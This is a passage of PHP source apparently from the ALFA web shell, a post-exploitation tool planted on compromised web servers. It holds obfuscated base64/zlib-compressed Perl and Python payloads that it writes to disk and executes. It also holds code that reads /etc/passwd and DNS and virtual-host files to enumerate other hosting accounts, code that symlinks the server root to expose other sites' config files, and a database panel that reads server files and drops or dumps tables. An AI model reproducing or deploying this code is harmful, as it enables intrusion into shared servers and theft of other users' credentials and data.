pSpp6BlAjhh4f2h7CU57Jiqznm/9Zt188KGVbK+VbGUTsaeCySn6FHvRL0O0Frixu8NJ6iUkLal1jIe0/zCB+orEMMkCkyBIesVcRtN5cB6ecUcSh3uPaJOmTcpR8UK90xkFQSMLdn2jiOi+OfsD8hwwLVraBVm5QMvC1J606R1ugMdchoeuOqkALJR9gkYJr7owlije6vUXll1oFqyM7GqjcOhU1pZaMwnuDiehVYaCGGQEiw10YAxpPPp/GxLJgFueWPLOv9q5trZIirNaqa9DN4NIWc4vUNdDk4Ieq6VAZQmz9a2XiN5Kp2CvL/NNnL2/hryHsU8f3Jb6gsx0wrDGqW1BnXmktetW6Rh2073mlfTRuNVyodndQm8TWahaDdilVIiWn/Wvo1MKKB0K60pl4qzNFjFSiWBsqr3RE6LlM4IvAkFhEDJT39FBe9srGsieLUz3ooeRByEd3Ir5VC3Bci2+irRI9FszCOS0VzJZCbfha4L5z22/WgtirYGdRBQxy3IeWwC0Alg1nkEAx7yJ4j/hYWs9GTTVbVCMHYMAcw3ghz3eRB76okG1hnOr4walUsLxzWH2gKR2JHdCjShA5/1qNhThSbQnLNwF3L16+DLSd/SCfsrFVowF6iK6rC8MeOGVDqoqnLQR16jwmGgTkduH8cAuxB0IBNnAoG4irCiT8ik4ihsL15Ab6q1WfQUFI72B/X493voyXZ+pmCPe+C3EzvJA3ww/lzbCfnufi+svgE6ELytBZliTZHOr1RyDI+ulbOXxkxVICyOulxnVyuPT00xNCLuFSru7keQLtA+XjXPztIQGRIHghdVkH2L9wSmDQ/w1wHelDNU/CArzRAxXvTN3OmOMoooyVV3II3+Faaq8nBUFBQ6tr1ONTuwzSnepOuG2ygrRXk7hVNhRdTMuv5bAmU6S8rlZe1E6U/7EAH/4H5eHKfSsRAAA=\")));";
            $py = "#!/usr/bin/python\nimport zlib, base64\nalfa_data='ALFA_DATA'\neval(compile(zlib.decompress(base64.b64decode(\"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\")),'<string>','exec'))";
            $cginame = "symperl.alfa";
            $source = $perl;
            $lang = "perl";
            if ($_POST["alfa2"] == "sympy") {
                $cginame = "pysymlink.alfa";
                $source = $py;
                $lang = "python";
            }
            @__write_file($cginame, $source);
            @chmod($cginame, 0755);
            echo __pre();
            $resource = alfaEx("{$lang} {$cginame} {$sympath}", false, true, true);
            if (strlen($resource) == 0) {
                echo AlfaiFrameCreator('cgialfa/' . $cginame);
            } else {
                echo $resource;
            }
        }
        if (isset($_POST['alfa4']) && $_POST['alfa4'] == 'SymFile') {
            if (function_exists('symlink') || _alfa_can_runCommand(true, true)) {
                AlfaNum(9, 10);
                echo __pre() . '
<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
<p><input type="submit" value=" " name="symlink" /></p></form></center>';
                $path = $_POST['alfa5'];
                $symname = $_POST['alfa6'];
                $solevisible58 = $_POST['alfa7'];
                if ($solevisible58) {
                    $new_name = str_replace(".", "_", basename($symname));
                    $rand_dir = $new_name . rand(111, 9999);
                    $sym_dir = 'alfasymlinkphp/' . $rand_dir . '/';
                    @mkdir($sym_dir, 0777, true);
                    alfacgihtaccess('sym', $sym_dir, $symname);
                    _alfa_symlink("{$path}", "{$sym_dir}/{$symname}");
                    echo __pre();
                    echo "<center><b><font color=\"white\">Click >> </font><a target=\"_blank\" href=\"ALFA_DATA/" . $sym_dir . '" ><b><font size="4">' . $symname . '</font></b></a></b></center>';
                }
            } else {
                echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
            }
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'symphp') {
            $cant_symlink = true;
            if (function_exists('symlink') || _alfa_can_runCommand(false, false)) {
                @mkdir('alfasymlink', 0777);
                alfacgihtaccess('sym', 'alfasymlink/');
                _alfa_symlink('/', 'alfasymlink/root');
                $table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
                if (_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")) {
                    echo "<center>";
                    $lines = array();
                    $anony_domains = array();
                    $anonymous_users = array();
                    $f_black = array();
                    $error = false;
                    $anonymous = false;
                    $makepwd = "/home/{user}/public_html/";
                    $domains = alfaGetDomains();
                    $lines = $domains["lines"];
                    $state = $domains["state"];
                    $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
                    $can_runcmd = _alfa_can_runCommand(false, false);
                    if (!$is_posix && !$can_runcmd) {
                        $anonymous = true;
                        $anony_domains = $domains["lines"];
                        $lines = _alfa_file('/etc/passwd');
                    }
                    echo $table_header;
                    $count = 1;
                    $template = "<tr><td><span style=\"color:#FFFF01;\">{count}</span></td><td style=\"text-align:left;\"><a target=\"_blank\" href=\"{http}\"/><span style=\"color:#00A220;margin-left:10px;\"><b>{domain}</b> </a></span></td><td style=\"text-align:left;\"><span style=\"color:#FFFFFF;margin-left:10px;\"><b>{owner}</font></b></td><td><a href=\"ALFA_DATA/alfasymlink/root{sympath}\" target=\"_blank\"><span style=\"color:#FF0000;\">Symlink</span></a></td></tr>";
                    foreach ($lines as $line) {
                        $domain = "";
                        $owner = "";
                        if ($anonymous) {
                            $explode = explode(":", $line);
                            $owner = $explode[0];
                            $owner_len = strlen($owner) - 1;
                            $userid = $explode[2];
                            if ((int) $userid < 500) {
                                continue;
                            }
                            $domain = "[?????]";
                            $temp_black = array();
                            $finded = false;
                            foreach ($anony_domains as $anony) {
                                if ($state == "named.conf") {
                                    if (@strstr($anony, 'zone')) {
                                        preg_match_all('#zone "(.*)"#', $anony, $data);
                                        $domain = $data[1][0];
                                    } else {
                                        continue;
                                    }
                                } elseif ($state == "named" || $state == "valiases") {
                                    if ($anony == "." || $anony == "..") {
                                        continue;
                                    }
                                    if ($state == "named") {
                                        $anony = rtrim($anony, ".db");
                                    }
                                    $domain = $anony;
                                }
                                $sub_domain = str_replace(array("-", "."), "", $domain);
                                if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) {
                                    if (in_array($owner . $domain, $temp_black)) {
                                        continue;
                                    }
                                    $sympath = str_replace("{user}", $owner, $makepwd);
                                    $http = "http://" . $domain;
                                    echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
                                    $count++;
                                    $temp_black[] = $owner . $domain;
                                    $finded = true;
                                }
                            }
                            if (!$finded) {
                                $anonymous_users[] = $owner;
                            }
                        } else {
                            if ($state == "named.conf") {
                                if (@strstr($line, 'zone')) {
                                    preg_match_all('#zone "(.*)"#', $line, $data);
                                    $domain = $data[1][0];
                                } else {
                                    continue;
                                }
                            } elseif ($state == "named" || $state == "valiases") {
                                if ($line == "." || $line == "..") {
                                    continue;
                                }
                                if ($state == "named") {
                                    $line = rtrim($line, ".db");
                                }
                                $domain = $line;
                            }
                            if (strlen(trim($domain)) > 2 && $state != "passwd") {
                                if (!_alfa_file_exists('/etc/valiases/' . $domain, false)) {
                                    continue;
                                }
                                if ($is_posix) {
                                    $user = @posix_getpwuid(@fileowner('/etc/valiases/' . $domain));
                                    $owner = $user["name"];
                                } elseif ($can_runcmd) {
                                    $owner = alfaEx("stat -c '%U' /etc/valiases/" . $domain, false, false);
                                }
                            }
                        }
                        if (!$anonymous) {
                            if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) {
                                continue;
                            }
                            $sympath = str_replace("{user}", $owner, $makepwd);
                            $http = "http://" . $domain;
                            if ($state == "passwd") {
                                $http = "javascript:alert('we cant find domain...')";
                            }
                            echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
                            $count++;
                            $f_black[] = $owner . $domain;
                        }
                    }
                    if ($anonymous) {
                        foreach ($anonymous_users as $owner) {
                            $sympath = str_replace("{user}", $owner, $makepwd);
                            $http = "javascript:alert('we cant find domain...')";
                            echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
                            $count++;
                        }
                    }
                    $cant_symlink = false;
                } else {
                    $is_direct = false;
                    $makepwd = alfaMakePwd();
                    if (_alfa_file_exists("/etc/virtual/domainowners")) {
                        $makepwd = "/home/{user}/public_html";
                        $is_direct = true;
                    }
                    $sole = _alfa_file("/etc/virtual/domainowners");
                    $count = 1;
                    echo $table_header;
                    $template = "<tr><td><span style=\"color:#FFFF01;\">{count}</span></td><td style=\"text-align:left;\"><a target=\"_blank\" href=\"http://www.{url}\"/><span style=\"color:#00A220;margin-left:10px;\"><b>{url}</b> </a></span></td><td style=\"text-align:left;\"><span style=\"color:#FFFFFF;margin-left:10px;\"><b>{user}</font></b></td><td><a href=\"ALFA_DATA/alfasymlink/root{cwd}\" target=\"_blank\"><span style=\"color:#FF0000;\">Symlink</span></a></td></tr>";
                    if ($sole) {
                        foreach ($sole as $visible) {
                            if (@strstr($visible, ":")) {
                                $solevisible = explode(':', $visible);
                                $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
                                echo str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
                            }
                        }
                    } else {
                        $passwd = _alfa_file("/etc/passwd");
                        if ($passwd) {
                            $html = "";
                            $is_named = false;
                            $users = array();
                            $domains = array();
                            $uknowns = array();
                            foreach ($passwd as $user) {
                                $user = trim($user);
                                $expl = explode(":", $user);
                                if ((int) $expl[2] < 500) {
                                    continue;
                                }
                                $users[$expl[0]] = $expl[5];
                            }
                            $site_domains = @scandir("/etc/virtual/");
                            if (!$site_domains) {
                                $site_domains = alfaEx("ls /etc/virtual/");
                                $site_domains = explode("\n", $site_domains);
                                if (!$site_domains) {
                                    $site_domains = _alfa_file("/etc/named.conf");
                                    if ($site_domains) {
                                        $is_named = true;
                                    }
                                }
                            }
                            foreach ($site_domains as $line) {
                                if ($is_named) {
                                    if (@strstr($line, 'zone')) {
                                        preg_match_all('#zone "(.*)"#', $line, $data);
                                        $domain = $data[1][0];
                                        if (strlen($domain > 2) && !empty($domain)) {
                                            $domains[] = $domain;
                                        }
                                    }
                                } else {
                                    $domains[] = $line;
                                }
                            }
                            $x = 1;
                            foreach ($users as $user => $home) {
                                foreach ($domains as $domain) {
                                    $user_len = strlen($user) - 1;
                                    $sub_domain = str_replace(array("-", "."), "", $domain);
                                    $five_user = substr($user, 0, $user_len);
                                    $five_domain = substr($sub_domain, 0, $user_len);
                                    if ($five_user == $five_domain) {
                                        if ($is_direct) {
                                            $cwd = str_replace("{user}", $user, $makepwd);
                                        } else {
                                            $expl = explode("}/", $makepwd);
                                            $cwd = $home . "/" . $expl[1];
                                        }
                                        $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
                                    } else {
                                        $uknowns[$user] = $home;
                                    }
                                }
                            }
                            $uknowns = array_unique($uknowns);
                            foreach ($uknowns as $user => $home) {
                                if ($is_direct) {
                                    $cwd = str_replace("{user}", $user, $makepwd);
                                } else {
                                    $expl = explode("}/", $makepwd);
                                    $cwd = $home . "/" . $expl[1];
                                }
                                $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
                            }
                            echo $html;
                        }
                    }
                    echo "</table>";
                    $cant_symlink = false;
                }
            } else {
                echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
                $cant_symlink = false;
            }
            if ($cant_symlink) {
                echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><font color=\"#FFFFFF\">Error...</font></b><br>";
            }
            echo "</center></table>";
        }
        echo "</div>";
        alfafooter();
    }
    function alfasql()
    {
        class DbClass
        {
            public $type;
            public $link;
            public $res;
            public $mysqli_connect_error = false;
            public $mysqli_connect_error_msg = "";
            function __construct($type)
            {
                $this->type = $type;
            }
            function connect($host, $user, $pass, $dbname)
            {
                switch ($this->type) {
                    case 'mysql':
                        if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) {
                            return true;
                        } else {
                            $this->mysqli_connect_error = true;
                            $this->mysqli_connect_error_msg = mysqli_connect_error();
                            return false;
                        }
                        break;
                    case 'pgsql':
                        $host = explode(':', $host);
                        if (!$host[1]) {
                            $host[1] = 5432;
                        }
                        if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) {
                            return true;
                        }
                        break;
                }
                return false;
            }
            function selectdb($db)
            {
                switch ($this->type) {
                    case 'mysql':
                        if (@mysqli_select_db($db)) {
                            return true;
                        }
                        break;
                }
                return false;
            }
            function query($str)
            {
                switch ($this->type) {
                    case 'mysql':
                        return $this->res = @mysqli_query($this->link, $str);
                    case 'pgsql':
                        return $this->res = @pg_query($this->link, $str);
                }
                return false;
            }
            function fetch()
            {
                $res = func_num_args() ? func_get_arg(0) : $this->res;
                switch ($this->type) {
                    case 'mysql':
                        return @mysqli_fetch_assoc($res);
                    case 'pgsql':
                        return @pg_fetch_assoc($res);
                }
                return false;
            }
            function listDbs()
            {
                switch ($this->type) {
                    case 'mysql':
                        return $this->query("SHOW databases");
                    case 'pgsql':
                        return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
                }
                return false;
            }
            function listTables()
            {
                switch ($this->type) {
                    case 'mysql':
                        return $this->res = $this->query('SHOW TABLES');
                    case 'pgsql':
                        return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
                }
                return false;
            }
            function error()
            {
                switch ($this->type) {
                    case 'mysql':
                        return @mysqli_error($this->link);
                    case 'pgsql':
                        return @pg_last_error();
                }
                return false;
            }
            function setCharset($str)
            {
                switch ($this->type) {
                    case 'mysql':
                        if (function_exists('mysql_set_charset')) {
                            return @mysqli_set_charset($this->link, $str);
                        } else {
                            $this->query('SET CHARSET ' . $str);
                        }
                        break;
                    case 'pgsql':
                        return @pg_set_client_encoding($this->link, $str);
                }
                return false;
            }
            function loadFile($str)
            {
                switch ($this->type) {
                    case 'mysql':
                        return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
                    case 'pgsql':
                        $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '" . addslashes($str) . "';select file from solevisible;");
                        $r = array();
                        while ($i = $this->fetch()) {
                            $r[] = $i['file'];
                        }
                        $this->query('drop table solevisible');
                        return array('file' => implode("\n", $r));
                }
                return false;
            }
        }
        $db = new DbClass($_POST['type']);
        alfahead();
        $form_visibility = "table";
        if (isset($_POST['sql_host'])) {
            $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
            if ($connection_db && !empty($_POST['sql_base'])) {
                $form_visibility = "none";
            }
        }
        $database_list = array();
        echo "\r\n<div class='header' style='min-height:300px;'>" . ($form_visibility != "none" ? "<center><div class='txtfont_header'>| Sql Manager |</div><p>" . getConfigHtml('all') . "</p></center><div style='text-align:center;margin-bottom: 10px;'><button class='connection-his-btn db-opt-id' onclick='alfaShowConnectionHistory(this);' mode='on'>Connection History</button><div class='connection_history_holder'></div></div>" : "") . "\r\n<div class='sf' class='db-opt-id'><table style='margin: 0 auto;" . ($form_visibility == "none" ? "display:none;" : "") . "' cellpadding='2' cellspacing='0'><tr>\r\n<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>\r\n<td><select name='type'><option value='mysql' selected>mysql</option></select></td>\r\n<td><input type='text' name='sql_host' id='db_host' value='" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "'></td>\r\n<td><input type='text' name='sql_login' id='db_user' value='" . (empty($_POST['sql_login']) ? '' : htmlspecialchars($_POST['sql_login'])) . "'></td>\r\n<td><input type='text' name='sql_pass' id='db_pw' value='" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "'></td><td>";
        $tmp = "<input type='text' name='sql_base' id='db_name' value='" . (empty($_POST['sql_base']) ? '' : htmlspecialchars($_POST['sql_base'])) . "'>";
        if (isset($_POST['sql_host'])) {
            if ($connection_db) {
                $db->setCharset('utf8');
                $db->listDbs();
                echo "<select name=sql_base><option value=''></option>";
                while ($item = $db->fetch()) {
                    list($key, $value) = each($item);
                    $database_list[] = $value;
                    echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
                }
                echo "</select>";
            } else {
                echo $tmp;
            }
        } else {
            echo $tmp;
        }
        $curr_mysql_id = $_POST['current_mysql_id'];
        echo "</td>\r\n<td><button onclick='fs(this);return false;' class='db-opt-id db-connect-btn'>Connect</button></td>\r\n<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>\r\n</tr>\r\n</table>";
        if ($db->mysqli_connect_error) {
            echo '<div style="text-align: center;font-size: 17px;margin-top: 18px;">' . $db->mysqli_connect_error_msg . '</div>';
        }
        if (!empty($curr_mysql_id)) {
            $sql_title_db = "";
            if (!empty($_POST['sql_base'])) {
                $sql_title_db = "d.querySelector('#tab_" . $curr_mysql_id . " span').innerHTML='" . addslashes($_POST['sql_base']) . "';";
            }
            echo "<script>mysql_cache['" . $curr_mysql_id . "']['host']='" . addslashes($_POST['sql_host']) . "';mysql_cache['" . $curr_mysql_id . "']['user']='" . addslashes($_POST['sql_login']) . "';mysql_cache['" . $curr_mysql_id . "']['pass']='" . addslashes($_POST['sql_pass']) . "';mysql_cache['" . $curr_mysql_id . "']['db']='" . addslashes($_POST['sql_base']) . "';mysql_cache['" . $curr_mysql_id . "']['charset']='" . addslashes($_POST['charset']) . "';mysql_cache['" . $curr_mysql_id . "']['type']='" . addslashes($_POST['type']) . "';mysql_cache['" . $curr_mysql_id . "']['count']='" . addslashes($_POST['sql_count']) . "';" . $sql_title_db . "alfaConnectionHistoryUpdate();</script>";
        }
        if (isset($db) && $db->link) {
            if (!empty($_POST['sql_base'])) {
                echo "<div class='mysql-main'><div mode='block' onclick='alfaMysqlTablePanelCtl(this);' class='tables-panel-ctl db-opt-id'>&#x3C;&#x3C;</div><div class='mysql-tables'><div><input placeholder=\"Filter Table\" style='padding: 0;margin-left: 11px;text-align:center;' type='text' name='filter_all'><button class='db-opt-id' onclick='alfaMysqlFilterAllTable(this);return false;'>Search</button></div><div class='block'><a sql_count='" . (empty($_POST['sql_count']) ? "false" : "true") . "' mode='closed' onclick='alfaMysqlFilterAllTable(this,true);' class='expander parent-expander db-opt-id' href='javascript:void(0);'><img src='http://solevisible.com/icons/menu/b_plus.png' title='Expand/Collapse All DataBases' alt='Expand/Collapse All DataBases'></a></div><ul style='margin-top: 28px;'>";
                foreach ($database_list as $db_name) {
                    echo '<li><div class="block"><i></i><b></b><a sql_count="' . (empty($_POST['sql_count']) ? "false" : "true") . '" db_target="' . $db_name . '" onclick="alfaMysqlExpander(this);" class="expander cls-' . $db_name . '-expander db-opt-id" href="javascript:void(0);"><img src="http://solevisible.com/icons/menu/' . ($db_name == $_POST['sql_base'] ? "b_minus.png" : "b_plus.png") . '" title="Expand/Collapse" alt="Expand/Collapse"></a></div><span class="db_name">' . $db_name . '</span><div class="clearfloat"></div><div db_name="' . $db_name . '" mode="' . ($db_name == $_POST['sql_base'] ? "loaded" : "no") . '" class="list_container cls-' . $db_name . '"><div>';
                    if ($db_name == $_POST['sql_base']) {
                        $db->selectdb($_POST['sql_base']);
                        $tbls_res = $db->listTables();
                        echo '<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" target=".cls-' . $db_name . '" placeholder="Filter Table" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';
                        while ($item = $db->fetch($tbls_res)) {
                            list($key, $value) = each($item);
                            if (!empty($_POST['sql_count'])) {
                                $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `' . $value . '`'));
                            }
                            $value = htmlspecialchars($value);
                            echo "<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a class='db-opt-id' db_target='" . $db_name . "' href='javascript:void(0);' onclick=\"alfaLoadTableData(this,'" . $value . "')\"><span class='mysql_tables' style='font-weight:unset;'>" . $value . "</span></a>" . (empty($_POST['sql_count']) ? '&nbsp;' : " <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</div></li>";
                        }
                        echo '</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" class="db-opt-id" target=".cls-' . $db_name . '" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" target=".cls-' . $db_name . '" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" class="db-opt-id" db_target="' . $db_name . '" target=".cls-' . $db_name . '" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>';
                    }
                    echo "</div></li>";
                }
                echo "</ul></div><div class='mysql-query-results'><div class='mysql-query-result-tabs'><div class='db-opt-id mysql-query-selected-tab' target='.mysql-query-result-content' onclick='alfaMysqlTabCtl(this);'>Result</div><div class='db-opt-id' target='.mysql-query-form' onclick='alfaMysqlTabCtl(this);'>Query</div><div class='db-opt-id' target='.mysql-search-area' onclick='alfaMysqlTabCtl(this);'>Search</div><div class='db-opt-id' target='.mysql-structure' onclick='alfaMysqlTabCtl(this);'>Structure</div><div class='db-opt-id' target='.mysql-insert-row' onclick='alfaMysqlTabCtl(this);'>Insert</div><div style='display:none;' class='db-opt-id' target='.mysql-edit-row' onclick='alfaMysqlTabCtl(this);'>Edit</div></div><div class='mysql-query-content mysql-insert-row mysql-hide-content'></div><div class='mysql-query-content mysql-edit-row mysql-hide-content'></div><div class='mysql-query-content mysql-search-area mysql-hide-content'></div><div class='mysql-query-content mysql-structure mysql-hide-content'></div><div class='mysql-query-content mysql-query-form mysql-hide-content'><div style='margin-bottom: 5px;'><span>Query:</span></div><textarea name='query' style='width:90%;height:100px'></textarea><p><div style='float:left;margin-left: 30px;'><input class='button db-opt-id' db_target='" . $_POST['sql_base'] . "' onclick='alfaMysqlQuery(this);return false;' type='submit' value=' '></div></p></div><div class='mysql-query-content mysql-query-result-content'><div class='mysql-query-result-header'><div style='margin-bottom: 10px;' class='mysql-query-reporter'></div><div class='mysql-query-pager'></div></div><div class='mysql-query-table'></div></div></form></td></tr>";
            }
            echo "</table></div>";
            echo "</div>";
        } else {
            echo htmlspecialchars($db->error());
        }
        echo "</div>";
        alfafooter();
    }
    function alfaSql_manager_api()
    {
        $db = $_POST["alfa1"];
        $type = $_POST["alfa2"];
        $sql_count = $_POST["alfa3"] == "true" ? true : false;
        $db = @json_decode($db, true);
        $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);
        @mysqli_set_charset($conn, "utf8");
        if ($conn) {
            if ($type == "load_all_tables") {
                $tables = array();
                $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('" . implode("','", $db["databases"]) . "');");
                $count = 0;
                while ($row = @mysqli_fetch_assoc($q_tables)) {
                    if ($sql_count) {
                        $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `' . $row["table_schema"] . '`.`' . $row["table_name"] . '`');
                        if ($count_q) {
                            $count = @mysqli_fetch_row($count_q);
                            $count = $count[0];
                        }
                    }
                    $tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int) $count);
                }
                foreach ($db["databases"] as $db) {
                    if (!isset($tables[$db])) {
                        $tables[$db] = null;
                    }
                }
                echo @json_encode($tables);
            } elseif ($type == "dump_drop") {
